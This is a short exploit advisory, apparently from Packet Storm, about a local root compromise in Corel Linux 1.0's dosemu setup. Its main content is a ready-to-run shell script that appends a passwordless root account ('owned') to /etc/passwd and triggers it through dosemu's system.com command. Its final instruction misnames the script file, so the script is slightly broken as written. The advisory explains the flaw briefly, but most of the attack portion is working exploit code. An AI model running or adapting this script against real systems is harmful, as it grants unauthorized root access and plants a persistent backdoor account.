Corel Linux dosemu config error. Local root compromise.
81ad1e0d833b1891556039a50544c4df1f8a580b3985a0e111e72d5f334fb2f2#
#
# suid@suid.kg - Corel Linux dosemu config error. Local root compromise.
#
# Software: Corel Linux 1.0 dosemu distribution configuration
# URL: http://linux.corel.com
# Version: Version 1.0
#
# The system.com command is available to any user who runs the
# dos emulator. This is a direct violation of the advice from
# the SECURITY readme file:
#
# Never allow the 'system.com' command (part of dosemu)
# to be executed. It makes dosemu execute the libc
# 'system() function'. Though privileges are turned off,
# the process inherits the switched uid-setting (uid=root,
# euid=user), hence the unix process can use setreuid to
# gain root access back. ... the rest you can imagine your self.
#
id
cat > hack-corel <<EOF
#!/bin/bash
echo "owned::0:0::/:/bin/bash" >> /etc/passwd
EOF
chmod a+rx hack-corel
export PATH="$PATH:."
dos
echo "when you hit a C:\ prompt, type 'system hack-core'"
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed